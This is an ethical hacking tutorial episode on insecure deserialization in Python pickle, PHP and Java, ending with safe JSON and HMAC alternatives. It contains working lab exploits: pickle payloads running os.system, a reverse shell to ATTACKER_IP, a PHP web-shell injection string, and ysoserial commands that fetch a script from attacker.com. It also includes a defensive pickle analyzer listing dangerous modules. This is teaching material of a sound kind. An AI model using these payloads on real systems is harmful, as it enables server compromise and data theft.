Learn Ethical Hacking (#19) - Insecure Deserialization - Code Execution via Data
What will I learn
- What serialization and deserialization are and why they're dangerous;
- Python pickle exploitation: crafting malicious serialized objects;
- PHP object injection: manipulating class properties to trigger unintended behavior;
- Java deserialization: the ysoserial toolkit and gadget chains;
- Building a pickle exploit from scratch in our lab;
- Why this vulnerability class is a recurring AI slop problem (Episode 6 callback).
Requirements
- A working modern computer running macOS, Windows or Ubuntu;
- Your hacking lab from Episode 2;
- Python 3 with Flask (pip install flask);
- The ambition to learn ethical hacking and security research.
Difficulty
- Intermediate
Curriculum (of the Learn Ethical Hacking series):
- Learn Ethical Hacking (#1) - Why Hackers Win
- Learn Ethical Hacking (#2) - Your Hacking Lab
- Learn Ethical Hacking (#3) - How the Internet Actually Works - For Attackers
- Learn Ethical Hacking (#4) - Reconnaissance - The Art of Not Being Noticed
- Learn Ethical Hacking (#5) - Active Scanning - Mapping the Attack Surface
- Learn Ethical Hacking (#6) - The AI Slop Epidemic - Why AI-Generated Code Is a Security Disaster
- Learn Ethical Hacking (#7) - Passwords - Why Humans Are the Weakest Cipher
- Learn Ethical Hacking (#8) - Social Engineering - Hacking the Human
- Learn Ethical Hacking (#9) - Cryptography for Hackers - What Protects Data (and What Doesn't)
- Learn Ethical Hacking (#10) - The Vulnerability Lifecycle - From Discovery to Patch to Exploit
- Learn Ethical Hacking (#11) - HTTP Deep Dive - Request Smuggling and Header Injection
- Learn Ethical Hacking (#12) - SQL Injection - The Bug That Won't Die
- Learn Ethical Hacking (#13) - SQL Injection Advanced - Extracting Entire Databases
- Learn Ethical Hacking (#14) - Cross-Site Scripting (XSS) - Injecting Code Into Browsers
- Learn Ethical Hacking (#15) - XSS Advanced - Bypassing Filters and CSP
- Learn Ethical Hacking (#16) - Cross-Site Request Forgery - Making Users Attack Themselves
- Learn Ethical Hacking (#17) - Authentication Bypass - Getting In Without a Password
- Learn Ethical Hacking (#18) - Server-Side Request Forgery - Making Servers Betray Themselves
- Learn Ethical Hacking (#19) - Insecure Deserialization - Code Execution via Data (this post)
Solutions to Episode 18 Exercises
Exercise 1 -- SSRF exploitation:
(a) /internal/secrets via SSRF: SUCCESS
curl "localhost:5000/preview?url=http://127.0.0.1:5000/internal/secrets"
Returned: SECRET_API_KEY and DB_PASSWORD
(b) Port scanning via timing:
Port 22 (SSH): responded in 0.01s -> OPEN
Port 80: timed out -> CLOSED
Port 5000: responded in 0.01s -> OPEN (our Flask app)
(c) file:// protocol:
requests library raises InvalidSchema -- file:// not supported.
However, urllib.request.urlopen() DOES support file://, so
applications using urllib are vulnerable to file reading.
The key insight: the requests library accidentally provides some SSRF protection by not supporting file://. But urllib (standard library) does. The default HTTP library choice can make or break SSRF exploitability.
Exercise 2 -- SSRF protection testing:
Bypass results against is_safe_url():
- http://127.0.0.1 -> BLOCKED
- http://[::1] -> BLOCKED (resolves correctly)
- http://2130706433 -> BLOCKED (decimal resolves correctly)
- http://localtest.me -> BLOCKED (DNS resolves to 127.0.0.1)
Remaining gap: DNS rebinding is NOT blocked because DNS resolution
happens at check time (returns safe IP) but the actual HTTP request
resolves DNS again (returns 127.0.0.1). Fix: resolve DNS once and
use the resolved IP for the actual request.
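A minimal sketch of that fix, assuming a hypothetical helper called resolve_public_ip (this is not the lab's actual is_safe_url code): resolve the name once, vet every address that comes back, and return the pinned IP so the HTTP request never triggers a second lookup.

```python
import ipaddress
import socket


def resolve_public_ip(hostname):
    """Resolve hostname once; return a vetted IP string or raise ValueError.

    Hypothetical helper: the caller should connect to the returned IP
    (and send the original hostname in the Host header) instead of
    letting the HTTP library resolve the name again.
    """
    infos = socket.getaddrinfo(hostname, None, proto=socket.IPPROTO_TCP)
    for info in infos:
        # sockaddr[0] is the address; drop any IPv6 zone suffix like %eth0
        address = info[4][0].split('%')[0]
        ip = ipaddress.ip_address(address)
        if ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_reserved:
            raise ValueError(f"{hostname} resolves to blocked address {ip}")
    # Every answer passed the check, so pin the first one
    return infos[0][4][0].split('%')[0]


for candidate in ('8.8.8.8', '127.0.0.1', '169.254.169.254'):
    try:
        print(candidate, '->', resolve_public_ip(candidate))
    except ValueError as err:
        print(candidate, '-> BLOCKED:', err)
```

The demo uses literal IPs so it runs without network access; with real hostnames the same function performs the single DNS lookup that the check and the request then share.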
Exercise 3 -- Capital One analysis:
Three changes that would have prevented the breach:
1. AWS IMDSv2 (requires PUT with token before GET -- blocks SSRF)
2. Principle of least privilege: WAF role should NOT have had S3
access to customer data buckets
3. Network segmentation: WAF should not reach metadata endpoint
Learn Ethical Hacking (#19) - Insecure Deserialization
Remember Episode 6 (AI Slop Epidemic) when we showed AI generating pickle.load() on untrusted data and said "this is catastrophic"? We're about to spend an entire episode understanding exactly WHY.
Every vulnerability we've covered since episode 11 exploits the boundary between user input and application logic. SQL injection (episodes 12-13) injects database commands through input fields. XSS (episodes 14-15) injects browser code through input fields. CSRF (episode 16) weaponizes the browser's trust in cookies. SSRF (episode 18) weaponizes the server's trust in itself. In every case, the attacker manipulates HOW the application processes data.
Insecure deserialization is different. The attacker doesn't manipulate how the application processes data -- they manipulate the data so it IS code. The application reads what it thinks is a data structure (a dictionary, an object, a session) and inadvertently executes arbitrary commands. The boundary between data and code dissolves completely.
Data becomes code. And that is the most dangerous transformation in security.
Serialization 101
First, some terminology. Serialization converts an in-memory object into a format that can be stored or transmitted -- bytes, strings, JSON, whatever. Deserialization converts it back into an in-memory object. Every application does this constantly: storing sessions, caching objects, sending data over the wire, passing messages between services.
The critical distinction is between data-only formats and code-capable formats:
import json
import pickle
# A simple Python object
user = {'name': 'Scipio', 'role': 'admin', 'score': 42}
# === JSON serialization -- SAFE (data only, no code) ===
json_data = json.dumps(user)
print(f"JSON: {json_data}")
# {"name": "Scipio", "role": "admin", "score": 42}
# JSON can only represent data: strings, numbers, arrays, objects.
# It cannot represent code, function calls, or object instantiation.
# That is what makes it safe.
# === Pickle serialization -- DANGEROUS (can embed code) ===
pickle_data = pickle.dumps(user)
print(f"Pickle: {len(pickle_data)} bytes of binary data")
# Pickle can represent ANYTHING Python can do -- including
# executing system commands. That is what makes it dangerous.
# We showed the exact pickle.load() vulnerability in Episode 6.
JSON, MessagePack, Protocol Buffers, and YAML (only when parsed with a safe loader such as PyYAML's yaml.safe_load; full YAML loaders can instantiate arbitrary objects) are data-only. They can represent strings, numbers, lists, and dictionaries. They cannot represent function calls, class instantiation, or system commands. Deserializing a JSON blob can never execute code, no matter how malicious the input is. The worst that happens is you get unexpected data values.
Python's pickle, Java's ObjectInputStream, PHP's unserialize(), Ruby's Marshal, .NET's BinaryFormatter -- these are code-capable. They reconstruct full objects, including calling constructors, invoking magic methods, and (in pickle's case) executing arbitrary callables. Deserializing malicious input in these formats can do ANYTHING the application has permission to do ;-)
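To make the data-only claim concrete, here is a small sketch that feeds json.loads() a blob stuffed with scary-looking names and then walks the result. The hostile string and the collect_types helper are made up for illustration.

```python
import json

# A "malicious" JSON document: the keys mimic pickle/Python internals
hostile = ('{"__reduce__": "os.system", "args": ["id; whoami"], '
           '"nested": {"__class__": "subprocess.Popen"}}')

parsed = json.loads(hostile)


def collect_types(value, seen=None):
    """Recursively gather every Python type present in a parsed JSON value."""
    seen = set() if seen is None else seen
    seen.add(type(value))
    if isinstance(value, dict):
        for key, item in value.items():
            collect_types(key, seen)
            collect_types(item, seen)
    elif isinstance(value, list):
        for item in value:
            collect_types(item, seen)
    return seen


print(sorted(t.__name__ for t in collect_types(parsed)))
print(repr(parsed["__reduce__"]))  # a plain string, never a callable
```

Whatever the attacker writes, the parser only ever hands back dicts, lists, strings, numbers, booleans, and None. Any danger would have to come from what the application later does with those values.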
The Pickle Protocol: How Python Executes Your Data
To understand pickle exploitation, you need to understand what pickle actually does. Pickle has its own bytecode instruction set -- a small stack-based virtual machine. When you call pickle.loads(), Python executes those bytecode instructions to reconstruct the object. One of those instructions is REDUCE, which calls an arbitrary callable with arbitrary arguments.
The key to exploitation is the __reduce__ method. When Python pickles an object, it calls __reduce__ to determine how to serialize it. When it UNpickles, it uses those instructions to reconstruct it. If __reduce__ returns a tuple of (callable, args), Python calls callable(*args) during deserialization:
import pickle
import os
class Exploit:
    """When unpickled, this object executes a system command."""
    def __reduce__(self):
        # __reduce__ tells pickle HOW to recreate this object.
        # We tell it to call os.system() with our command.
        # During deserialization, Python will execute:
        #     os.system('id; whoami')
        return (os.system, ('id; whoami',))
# Create the malicious pickle payload
payload = pickle.dumps(Exploit())
print(f"Payload size: {len(payload)} bytes")
print(f"Payload (hex): {payload.hex()[:80]}...")
# When a vulnerable application deserializes this:
# result = pickle.loads(payload)
# It executes: os.system('id; whoami')
# Output: uid=1000(webapp) gid=1000(webapp) groups=1000(webapp)
That's it. No buffer overflow, no memory corruption, no race condition. You define a class with __reduce__, pickle it, and anyone who unpickles it runs your command. The payload is a few dozen bytes. The impact is arbitrary code execution.
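If you want to watch the mechanism without running a shell command, here is a harmless sketch that swaps os.system for the builtin sorted(). The Demo class is invented for this illustration.

```python
import pickle


class Demo:
    """Harmless stand-in for an exploit class: the callable is sorted()."""
    def __reduce__(self):
        return (sorted, ([3, 1, 2],))


payload = pickle.dumps(Demo())
result = pickle.loads(payload)

# loads() does not rebuild a Demo instance. It calls sorted([3, 1, 2])
# and returns whatever that call returned.
print(type(result).__name__, result)
```

The unpickled "object" is just the return value of the callable. Replace sorted with os.system and the same few lines become the exploit shown above.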
Let's look at what the pickle bytecode actually contains:
import pickle
import pickletools
import os
class Exploit:
    def __reduce__(self):
        return (os.system, ('id',))
payload = pickle.dumps(Exploit())
# Disassemble the pickle to see what instructions it contains
print("=== Pickle bytecode disassembly ===")
pickletools.dis(payload)
# Output (simplified, default protocol 4+ on Linux):
#   SHORT_BINUNICODE 'posix'    ('nt' on Windows)
#   SHORT_BINUNICODE 'system'
#   STACK_GLOBAL                <-- imports posix.system
#   SHORT_BINUNICODE 'id'
#   TUPLE1
#   REDUCE                      <-- THIS is where the code executes
#   STOP
# Protocols 0-3 use a single GLOBAL 'posix system' opcode for the import.
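The GLOBAL opcode (STACK_GLOBAL in protocol 4 and later) loads a callable by module and name. REDUCE calls it with the arguments on the stack. The pickle VM itself is deliberately simple: it has no loops, branches, or arithmetic, and it runs each opcode once from the first byte to STOP. That doesn't limit the attacker, though, because REDUCE can call any importable callable, including builtins like eval and exec, so a pickle can hand off to arbitrarily complex Python. Researchers have built entire exploit frameworks on top of hand-written pickle bytecode.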
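Which import opcode you see depends on the pickle protocol, which matters when you write detection rules. A quick sketch using pickletools.genops() to list opcode names for the same object under two protocols (the Demo class and opcode_names helper are illustrative, and the callable is a harmless sorted()):

```python
import pickle
import pickletools


class Demo:
    def __reduce__(self):
        return (sorted, ([3, 1, 2],))


def opcode_names(payload):
    """Return the opcode names in a pickle without executing it."""
    return [opcode.name for opcode, _arg, _pos in pickletools.genops(payload)]


old_style = opcode_names(pickle.dumps(Demo(), protocol=2))
new_style = opcode_names(pickle.dumps(Demo(), protocol=4))

print("protocol 2 import opcode:", [n for n in old_style if 'GLOBAL' in n])
print("protocol 4 import opcode:", [n for n in new_style if 'GLOBAL' in n])
print("REDUCE present in both:", 'REDUCE' in old_style and 'REDUCE' in new_style)
```

A scanner that only greps for GLOBAL will miss every pickle produced with the current default protocol, so look for both opcodes.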
Building a Vulnerable Lab
Let's build a web application that uses pickle for session storage -- a pattern that is disturbingly common in real codebases:
#!/usr/bin/env python3
"""Vulnerable application using pickle for session cookies. LAB ONLY."""
from flask import Flask, request, make_response
import pickle
import base64
app = Flask(__name__)
@app.route('/')
def index():
    session_cookie = request.cookies.get('session_data')
    if session_cookie:
        try:
            # VULNERABLE: deserializing untrusted cookie data
            session = pickle.loads(base64.b64decode(session_cookie))
            return f"Welcome back, {session.get('username', 'unknown')}! Role: {session.get('role', 'user')}"
        except Exception as e:
            return f"Session error: {e}"
    # First visit -- set a normal session cookie
    session = {'username': 'guest', 'role': 'user', 'visits': 1}
    resp = make_response("Welcome, guest! Session cookie set.")
    cookie_data = base64.b64encode(pickle.dumps(session)).decode()
    resp.set_cookie('session_data', cookie_data)
    return resp
@app.route('/admin')
def admin():
    session_cookie = request.cookies.get('session_data')
    if session_cookie:
        # VULNERABLE: same untrusted deserialization, without error handling
        session = pickle.loads(base64.b64decode(session_cookie))
        if session.get('role') == 'admin':
            return "ADMIN PANEL: User count: 14,293 | Revenue: $892,100"
    return "Access denied. Admin only.", 403
if __name__ == '__main__':
    app.run(host='0.0.0.0', port=5000)
Now the exploit. We craft a malicious cookie that executes a command when the server deserializes it:
#!/usr/bin/env python3
"""Pickle exploit generator -- creates malicious session cookies. LAB ONLY."""
import pickle
import base64
import os
import sys
class FileCreator:
    """Creates a file on the server to prove code execution."""
    def __reduce__(self):
        return (os.system, ('touch /tmp/pickle-pwned && echo PWNED > /tmp/pickle-pwned',))
class FileReader:
    """Reads /etc/passwd and writes it to a file we can retrieve."""
    def __reduce__(self):
        return (os.system, ('cp /etc/passwd /tmp/passwd-stolen',))
class ReverseShell:
    """Opens a reverse shell back to the attacker."""
    def __reduce__(self):
        cmd = "python3 -c 'import socket,subprocess;s=socket.socket();s.connect((\"ATTACKER_IP\",4444));subprocess.call([\"/bin/sh\"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())'"
        return (os.system, (cmd,))
# Generate exploit cookies
exploits = {
    'file_create': FileCreator(),
    'file_read': FileReader(),
    'reverse_shell': ReverseShell(),
}
for name, exploit in exploits.items():
    cookie = base64.b64encode(pickle.dumps(exploit)).decode()
    print(f"\n=== {name} ===")
    print(f"Cookie value: {cookie[:60]}...")
    print(f"Full length: {len(cookie)} characters")
# Demonstrate the file_create exploit
print("\n=== Testing file_create exploit ===")
print("Use this curl command against the vulnerable app:")
cookie = base64.b64encode(pickle.dumps(FileCreator())).decode()
print(f'curl -b "session_data={cookie}" http://localhost:5000/')
print("Then check: ls -la /tmp/pickle-pwned")
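Putting it together in the shell, with the two scripts above saved as pickle_lab.py and pickle_exploit.py:
# Start the vulnerable app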
python3 pickle_lab.py &
# Normal use -- get a legitimate session cookie
curl -c cookies.txt http://localhost:5000/
# Returns: "Welcome, guest! Session cookie set."
# Generate the exploit cookie
python3 pickle_exploit.py
# Send the malicious cookie
curl -b "session_data=EXPLOIT_COOKIE_HERE" http://localhost:5000/
# The server deserializes the cookie -> os.system() executes
# Check for proof: cat /tmp/pickle-pwned
# Output: PWNED
From "user visits website" to "attacker has code execution on the server" -- through a cookie. The server reads what it thinks is session data and instead runs an arbitrary system command. The HTTP request looks completely normal. The cookie is a valid base64 string. Unless a WAF or IDS decodes cookie values and inspects them for pickle opcodes, nothing about the request stands out. The only thing unusual is the content of the deserialized data, and by the time the server knows what's in it, the command has already executed.
Analyzing Pickles Without Executing Them
You should never pickle.loads() data you don't trust. But what if you need to inspect a pickle payload without running it? The pickletools module can disassemble pickle bytecode safely:
#!/usr/bin/env python3
"""
Pickle payload analyzer -- inspects pickles WITHOUT executing them.
Flags dangerous operations (GLOBAL loading os, subprocess, etc.)
"""
import pickletools
import base64
import sys
import io
DANGEROUS_MODULES = {
    'os', 'posix', 'nt', 'subprocess', 'pty', 'shutil',
    'importlib', 'builtins', '__builtin__', 'sys', 'code', 'codeop',
    'socket', 'http', 'urllib', 'webbrowser',
}
def find_imports(data):
    """List the (module, name) pairs a pickle would import, without loading it."""
    imports, strings = [], []
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name in ('GLOBAL', 'INST'):
            # Protocols 0-3: the argument is the string "module name"
            imports.append(tuple(arg.split(' ', 1)))
        elif opcode.name == 'STACK_GLOBAL':
            # Protocol 4+: module and name are normally the two strings pushed
            # just before. Heuristic only: a hand-crafted pickle can hide them,
            # so an unresolvable import is reported as '?'
            imports.append(tuple(strings[-2:]) if len(strings) >= 2 else ('?', '?'))
        elif isinstance(arg, str):
            strings.append(arg)
    return imports
def analyze_pickle(data, label=""):
    """Disassemble and analyze a pickle payload."""
    print(f"\n{'='*60}")
    if label:
        print(f"Analyzing: {label}")
    print(f"Payload size: {len(data)} bytes")
    print(f"{'='*60}")
    # Capture disassembly
    output = io.StringIO()
    try:
        pickletools.dis(data, output)
        imports = find_imports(data)
    except Exception as e:
        print(f"[-] Disassembly failed: {e}")
        return
    print(output.getvalue())
    # Match the top-level module name exactly; substring checks misfire
    # (for example 'os' is a substring of 'posix' and of 'cosmos')
    dangers = [f"{module}.{name}" for module, name in imports
               if module == '?' or module.split('.')[0] in DANGEROUS_MODULES]
    if dangers:
        print(f"\n[!!!] DANGEROUS OPERATIONS DETECTED:")
        for d in dangers:
            print(f"    {d}")
        print(f"\n[!!!] This pickle would execute code if loaded!")
    else:
        print(f"\n[OK] No obviously dangerous operations found.")
        print(f"    (Still don't trust it -- pickle is inherently unsafe)")
# Demo: analyze a benign pickle
import pickle, os
benign = pickle.dumps({'username': 'guest', 'role': 'user'})
analyze_pickle(benign, "Benign session data")
# Demo: analyze a malicious pickle
class Evil:
    def __reduce__(self):
        return (os.system, ('id',))
malicious = pickle.dumps(Evil())
analyze_pickle(malicious, "Malicious payload")
Abridged output (Linux, pickle protocol 4):
=== Analyzing: Benign session data ===
    0: \x80 PROTO      4
    2: \x95 FRAME      ...
    ...
[OK] No obviously dangerous operations found.
=== Analyzing: Malicious payload ===
    0: \x80 PROTO      4
    ...
    SHORT_BINUNICODE 'posix'
    SHORT_BINUNICODE 'system'
    STACK_GLOBAL
    SHORT_BINUNICODE 'id'
    TUPLE1
    REDUCE
    ...
[!!!] DANGEROUS OPERATIONS DETECTED:
    posix.system
[!!!] This pickle would execute code if loaded!
This is the safe way to inspect pickles. You never call pickle.loads() -- you just disassemble the bytecode and look for dangerous opcodes. In a real pentest, if you find an endpoint that accepts pickled data (cookies, API parameters, cached objects, message queues), you'd first craft a benign pickle to verify deserialization happens, then swap in an exploit pickle.
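Before any of that, you need to recognize that a cookie or parameter is a pickle at all. A rough recon sketch, assuming the value is plain base64 as in our lab (looks_like_pickle is a made-up helper name): protocol 2+ pickles start with the PROTO byte 0x80 plus a version number and end with the STOP opcode, a literal dot.

```python
import base64
import binascii
import json
import pickle


def looks_like_pickle(value):
    """Heuristic: does this base64 string decode to a protocol 2+ pickle?

    Only inspects the first two bytes and the last byte. Nothing is loaded.
    """
    try:
        raw = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return False
    return (len(raw) >= 3
            and raw[0] == 0x80                           # PROTO opcode
            and 2 <= raw[1] <= pickle.HIGHEST_PROTOCOL   # protocol version
            and raw.endswith(b'.'))                      # STOP opcode


session = {'username': 'guest', 'role': 'user'}
pickle_cookie = base64.b64encode(pickle.dumps(session)).decode()
json_cookie = base64.b64encode(json.dumps(session).encode()).decode()

print(pickle_cookie[:8], looks_like_pickle(pickle_cookie))
print(json_cookie[:8], looks_like_pickle(json_cookie))
```

Because the first byte is always 0x80 and the protocol number is small, base64-encoded pickles begin with the characters gA. That prefix is a handy thing to grep for in proxy logs.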
PHP Object Injection
PHP's unserialize() has the same fundamental problem, but the exploitation mechanism is different. PHP doesn't have an equivalent of __reduce__ that directly calls functions. Instead, PHP calls magic methods like __wakeup(), __destruct(), __toString(), and __call() when objects are unserialized and used. The attacker exploits existing classes in the application that have dangerous operations in these magic methods:
<?php
// Existing class in the application's codebase
class FileManager {
    public $logfile;
    public $content;
    // Called automatically when the object is destroyed
    function __destruct() {
        // Intended use: write log entries
        file_put_contents($this->logfile, $this->content, FILE_APPEND);
    }
}
// Normal use: $fm = new FileManager();
//             $fm->logfile = '/var/log/app.log';
//             $fm->content = "User logged in\n";
// Attacker crafts serialized FileManager with:
//   logfile = "/var/www/html/shell.php"
//   content = a one-line PHP web shell that runs the cmd query parameter
//             (the exact shell below is one example)
// Each s:N: prefix must equal the byte length of the string that follows,
// otherwise unserialize() rejects the payload.
$evil_serialized = 'O:11:"FileManager":2:{s:7:"logfile";s:23:"/var/www/html/shell.php";s:7:"content";s:30:"<?php system($_GET["cmd"]); ?>";}';
// When the application does: $obj = unserialize($user_input);
// PHP creates a FileManager object with attacker-controlled properties
// When the object is garbage-collected, __destruct() fires
// file_put_contents writes a web shell to the web root
// Attacker visits: http://target.com/shell.php?cmd=id
// Game over.
?>
The attacker doesn't inject NEW code into the application. They REUSE existing classes in unexpected ways -- setting properties to values the original developer never anticipated. The FileManager class was meant to write log files. The attacker points it at the web root with PHP code as the "log content". The class does exactly what it's programmed to do. It just does it with attacker-controlled inputs.
This technique is called a POP chain (Property-Oriented Programming). It's the object-oriented equivalent of ROP (Return-Oriented Programming) in binary exploitation. In both cases, the attacker doesn't inject code -- they chain together existing code fragments (gadgets in ROP, magic methods in POP) to achieve arbitrary behavior. Finding exploitable POP chains requires deep knowledge of the target application's class hierarchy, which is why PHP deserialization vulns are common in large frameworks like Laravel, Symfony, and WordPress plugins where dozens of classes with exploitable magic methods are available.
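PHP's serialized format is length-prefixed, so hand-editing payloads is error-prone: one wrong byte count and unserialize() fails. A small Python sketch that builds the string for you, assuming only public string properties (php_string and php_object are hypothetical helper names; private and protected properties use a different key encoding that this does not cover):

```python
def php_string(value):
    """Encode one string in PHP serialize() format: s:<byte length>:"<value>";"""
    byte_length = len(value.encode('utf-8'))
    return f's:{byte_length}:"{value}";'


def php_object(class_name, properties):
    """Encode an object whose properties are all public strings."""
    name_length = len(class_name.encode('utf-8'))
    body = ''.join(php_string(key) + php_string(val)
                   for key, val in properties.items())
    return f'O:{name_length}:"{class_name}":{len(properties)}:{{{body}}}'


payload = php_object('FileManager', {
    'logfile': '/var/www/html/shell.php',
    'content': 'test entry',   # harmless placeholder content
})
print(payload)
```

Lengths are counted in bytes, not characters, which is why the helper encodes to UTF-8 before measuring.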
Java Deserialization: The Enterprise Apocalypse
Java's ObjectInputStream.readObject() is arguably the most impactful deserialization vulnerability class in the history of software. The Java ecosystem's love of object serialization, combined with massive enterprise codebases full of exploitable class hierarchies, created an attack surface that affected nearly every major Java application.
The ysoserial tool generates payloads for dozens of known "gadget chains" -- sequences of Java method calls triggered during deserialization that culminate in arbitrary command execution:
# Generate a Java deserialization payload targeting Apache Commons Collections
java -jar ysoserial.jar CommonsCollections1 'touch /tmp/java-pwned' > payload.bin
# Generate payload for Spring framework gadget chain
java -jar ysoserial.jar Spring1 'wget http://attacker.com/shell.sh -O /tmp/s.sh' > payload.bin
# Generate payload for Hibernate ORM chain
java -jar ysoserial.jar Hibernate1 'bash -c {echo,BASE64_REVERSE_SHELL}|{base64,-d}|bash' > payload.bin
# If the target application deserializes this binary data with
# ObjectInputStream.readObject(), the command executes on the server.
The devastation caused by Java deserialization bugs is hard to overstate:
CVE-2015-4852 (Oracle WebLogic, via Apache Commons Collections): The gadget chain lived in commons-collections, a library on the classpath of most Java applications of the era, so any of them that deserialized untrusted data was exposed. WebLogic, JBoss, Jenkins, and WebSphere were all hit, each under its own CVE. The patch wasn't straightforward because removing the library broke functionality across entire application stacks.
CVE-2017-5638 (Apache Struts): Triggered the Equifax breach -- the records of roughly 147 million people stolen. Strictly speaking this one is OGNL expression injection rather than native Java deserialization: the Jakarta Multipart parser evaluated attacker-supplied OGNL from the Content-Type header. It belongs in the same family because the root failure is identical: data from the request was interpreted as code. Equifax had the patch available for about TWO MONTHS before the breach and didn't apply it.
Jenkins deserialization (CVE-2017-1000353): Allowed unauthenticated remote code execution on Jenkins CI servers. Jenkins uses Java serialization extensively for its remoting protocol. Any Jenkins instance exposed to the network was vulnerable. Thousands of build servers compromised.
Having said that, the Java ecosystem has responded. Modern Java (9+) has the ObjectInputFilter API that lets you whitelist which classes can be deserialized. Libraries like Apache Commons Collections have been patched. Many frameworks have moved away from Java native serialization toward JSON (Jackson, Gson). But the legacy attack surface is enormous, and enterprise applications that were built in the 2010s and never fully modernized are still running in production with vulnerable deserialization endpoints ;-)
The AI Slop Connection
This is where Episode 6 comes full circle. When you ask an AI code assistant to generate code for "saving application state", "caching objects between requests", "passing Python objects between services", or "storing user preferences" -- the AI reaches for pickle. It's the simplest solution. It handles arbitrary Python objects. It's in the standard library. And it's catastrophically unsafe for any data that comes from an untrusted source.
The AI doesn't distinguish between "serializing data I created" (relatively safe, as long as the storage medium isn't attacker-writable) and "deserializing data from an untrusted source" (code execution). From the AI's perspective, pickle.dumps() and pickle.loads() are symmetric operations -- one saves, one loads. The security asymmetry is invisible.
Here's what makes this particularly insidious: the vulnerable code WORKS. The session system works. The cache works. The message queue works. Every functional test passes. The pickle-based session stores and retrieves user data correctly. The vulnerability is completely invisible during development and testing because the developer is the only one providing the data. It only manifests when an attacker provides THEIR data -- a malicious pickle payload where the application expected a dict.
This same pattern appears in every language:
- Python: pickle.loads(user_input) -- arbitrary code execution
- PHP: unserialize($user_input) -- object injection via POP chains
- Java: new ObjectInputStream(user_input).readObject() -- gadget chain execution
- Ruby: Marshal.load(user_input) -- arbitrary code execution
- .NET: BinaryFormatter.Deserialize(user_input) -- arbitrary code execution
Every one of these is generated by AI code assistants in contexts where JSON would be the safe (and correct) choice.
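When you review generated code, you can at least find the Python variant mechanically. A minimal sketch using the standard ast module; find_pickle_loads is a hypothetical helper, and it only catches direct pickle.load() / pickle.loads() calls, not aliased imports such as "from pickle import loads".

```python
import ast


def find_pickle_loads(source, filename="<string>"):
    """Return sorted (line, call) pairs for pickle.load / pickle.loads calls."""
    findings = []
    for node in ast.walk(ast.parse(source, filename=filename)):
        if (isinstance(node, ast.Call)
                and isinstance(node.func, ast.Attribute)
                and node.func.attr in ("load", "loads")
                and isinstance(node.func.value, ast.Name)
                and node.func.value.id == "pickle"):
            findings.append((node.lineno, f"pickle.{node.func.attr}"))
    return sorted(findings)


sample = '''import pickle, json

def load_session(cookie):
    return pickle.loads(cookie)

def load_config(text):
    return json.loads(text)
'''

for line, call in find_pickle_loads(sample):
    print(f"line {line}: {call}() -- check where its input comes from")
```

A hit is not automatically a vulnerability. The question for each finding is whether an attacker can influence the bytes being loaded.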
Safe Alternatives
The fix is conceptually simple: use data-only serialization formats for untrusted data:
import json
import hmac
import hashlib
SECRET_KEY = b'your-secret-key-here-use-os.urandom(32)-in-production'
# === Safe state storage using JSON ===
def save_session(data, secret=SECRET_KEY):
    """Serialize session data safely using JSON + HMAC signing."""
    json_bytes = json.dumps(data, sort_keys=True).encode()
    signature = hmac.new(secret, json_bytes, hashlib.sha256).hexdigest()
    return json_bytes.decode() + '.' + signature
def load_session(signed_data, secret=SECRET_KEY):
    """Deserialize session data safely -- verify signature first."""
    try:
        json_str, signature = signed_data.rsplit('.', 1)
        expected = hmac.new(secret, json_str.encode(), hashlib.sha256).hexdigest()
        if not hmac.compare_digest(signature, expected):
            return None  # Tampered -- reject
        return json.loads(json_str)
    except (ValueError, TypeError):
        # ValueError: missing '.' separator or invalid JSON
        # TypeError: compare_digest() refuses non-ASCII str input
        return None
# Usage
session = {'username': 'scipio', 'role': 'user'}
signed = save_session(session)
print(f"Signed session: {signed[:60]}...")
# Legitimate load
loaded = load_session(signed)
print(f"Loaded: {loaded}") # {'username': 'scipio', 'role': 'user'}
# Tampered load (attacker modifies the JSON)
tampered = signed.replace('"user"', '"admin"')
loaded = load_session(tampered)
print(f"Tampered: {loaded}") # None -- signature mismatch, rejected
JSON can never execute code. The HMAC signature prevents tampering. Even if an attacker intercepts the signed session, they can't modify it without the secret key. And even if they could somehow forge the HMAC, the worst possible outcome is unexpected data values -- never code execution. This is a fundamentally different security posture from pickle, where the best case is "it works" and the worst case is "arbitrary RCE."
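One practical wrinkle if you put this in a real cookie: raw JSON contains quotes, commas, and spaces, which are not safe cookie characters. A sketch of the same sign-then-verify idea with the JSON wrapped in URL-safe base64 (encode_cookie and decode_cookie are illustrative names, not part of the lab code above):

```python
import base64
import hashlib
import hmac
import json


def encode_cookie(data, secret):
    """JSON -> urlsafe base64 -> append hex HMAC of the encoded body."""
    body = base64.urlsafe_b64encode(json.dumps(data, sort_keys=True).encode())
    sig = hmac.new(secret, body, hashlib.sha256).hexdigest().encode()
    return (body + b'.' + sig).decode('ascii')


def decode_cookie(value, secret):
    """Verify the HMAC first, then decode. Returns None on any failure."""
    try:
        body, sig = value.encode('ascii').rsplit(b'.', 1)
    except ValueError:  # non-ASCII input or missing '.' separator
        return None
    expected = hmac.new(secret, body, hashlib.sha256).hexdigest().encode()
    if not hmac.compare_digest(sig, expected):
        return None
    try:
        return json.loads(base64.urlsafe_b64decode(body))
    except ValueError:
        return None


secret = b'k' * 32  # placeholder key for the demo only
cookie = encode_cookie({'username': 'scipio', 'role': 'user'}, secret)
print(cookie[:50] + '...')
print(decode_cookie(cookie, secret))
```

Signing is not encryption: anyone holding the cookie can still base64-decode and read it, so keep secrets out of the session data.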
If you absolutely MUST use native serialization (some legitimate use cases exist, like IPC between trusted processes on the same machine), sign the data with HMAC and verify the signature BEFORE deserializing:
import pickle
import hmac
import hashlib
SECRET = b'internal-process-secret'
def safe_pickle_dump(obj, secret=SECRET):
    """Pickle with HMAC signature -- only for trusted internal use."""
    data = pickle.dumps(obj)
    sig = hmac.new(secret, data, hashlib.sha256).digest()
    return sig + data
def safe_pickle_load(signed_data, secret=SECRET):
    """Verify HMAC before unpickling -- rejects tampered data."""
    sig = signed_data[:32]
    data = signed_data[32:]
    expected = hmac.new(secret, data, hashlib.sha256).digest()
    if not hmac.compare_digest(sig, expected):
        raise ValueError("HMAC verification failed -- data tampered")
    return pickle.loads(data)  # Only deserialize AFTER verification
The HMAC verification MUST happen before the pickle.loads() call. If an attacker can't forge the HMAC, they can't get their malicious pickle through to the deserializer. This doesn't make pickle safe for untrusted input -- it makes pickle safe for data that you signed yourself. The distinction matters.
